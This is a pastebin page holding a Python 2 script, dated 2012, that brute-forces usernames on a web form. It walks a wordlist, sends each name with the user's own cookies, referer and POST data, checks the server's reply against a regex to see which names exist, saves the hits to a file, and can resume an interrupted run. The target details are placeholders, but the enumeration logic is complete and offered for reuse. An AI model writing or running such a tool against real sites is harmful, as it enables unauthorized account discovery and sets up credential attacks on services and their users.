Don't like ads? PRO users don't see any ads ;-)
Text below is selected. Please press Ctrl+C to copy to your clipboard. (⌘+C on Mac)
- #!/usr/bin/python
- #Author: Craig Freyman
- #Description: Brute force usernames on a web form
- #Version: 1.0
- #Date: May 27, 2012
- #Website: www.pwnag3.com
- import urllib2,re,sys,os.path
- def check_found_users():
- global append_or_overwrite
- if os.path.exists("found_users.txt"):
- append_or_overwrite = raw_input("\033[1;32m[*] Found an existing \"found_users.txt\" file. Press \"w\" to overwrite or \"a\" to append.\033[1;m\n")
- if append_or_overwrite not in ("w","a"):
- print "\033[1;31m[-] Please only press \"w\" or \"a\" .\033[1;m"
- check_found_users()
- def check_resume():
- global resume_or_not
- global resume_start_word
- #simply check the current directory for our resume file
- if os.path.exists("resume_file.txt"):
- resume_or_not = raw_input("\033[1;32m[*] Found a resume file - Press \"R\" to resume or ENTER continue\033[1;m\n")
- #if user wants to resume, read the resume file to store the last word as a variable
- if resume_or_not in ("R","r"):
- open_resume = open("resume_file.txt")
- resume_start_word = open_resume.readline()
- open_resume.close()
- def resumefile():
- resume_file = open("resume_file.txt","w")
- resume_file.write(username+"\n")
- resume_file.close()
- def search_file():
- global offset
- b = open(usernamefile).read()
- offset = b.find(resume_start_word)
- def main():
- global username
- global counter
- counter = 0
- #attempt to open the user specified username file
- try:
- f = open(usernamefile,'r')
- except:
- print "\033[1;31m[-] Could not open file\033[1;m"
- sys.exit(1)
- #check to see if we're resuming. if we are, search the file and calc offset so we can jump to it
- if resume_or_not == "R" or resume_or_not == "r":
- search_file()
- f.seek(offset)
- #main program loop to iterate through our text file and do stuff
- for username in f:
- username = username[:-1]
- #every iteration, call resumefile() to write the last word to the file
- resumefile()
- #in my situation, I had to do things with 2 urls - adjust for your purposes
- url = "ADD YOUR URL"
- url2 = "ADD YOUR URL"
- #since we have custom headers use the build_opener and add headers
- opener = urllib2.build_opener()
- opener.addheaders.append(('Cookie', 'ADD ANY COOKIE INFORMATION HERE'))
- opener.addheaders.append(('Referer', 'PUT THE REFERER IN HERE IF NECESSARY'))
- f = opener.open(url,"PUT ANY REQUIRED POST INFORMATION HERE")
- #access the next url
- f2 = opener.open(url2)
- #capture the response in the_page
- the_page = f2.read()
- #regex match
- answer = re.search(r'PUT SOMETHING IN HERE THAT WILL BE IN THE RESPONSE FROM THE SERVER[a-zA-Z]',the_page,re.M)
- #print our results
- if answer is None:
- print "\033[1;31m[-] " +username+ "\033[1;m"
- else:
- print "\033[1;32m[+] "+username+ "\033[1;m"
- outfile.write(username+"\n")
- counter+=1
- f.close()
- outfile.close()
- if __name__ == '__main__':
- try:
- if len(sys.argv) != 2:
- print "[+] Usage: ./filename <username_file>"
- sys.exit(1)
- usernamefile = sys.argv[1]
- append_or_overwrite = "a"
- resume_or_not = "no"
- #check for found_users file
- check_found_users()
- #if it returns nothing, lets just default to append
- #check to see if there is an existing resume file
- check_resume()
- #open the file to write discovered users to and append or overwrite, based on users response
- outfile = open("found_users.txt",append_or_overwrite)
- #start main program
- main()
- #done
- print "\033[1;34m[*] Done - found "+str(counter)+" users.\033[1;m"
- except KeyboardInterrupt:
- print "\033[1;34m\n[*] Program terminated.\033[1;m"
create a new version of this paste
RAW Paste Data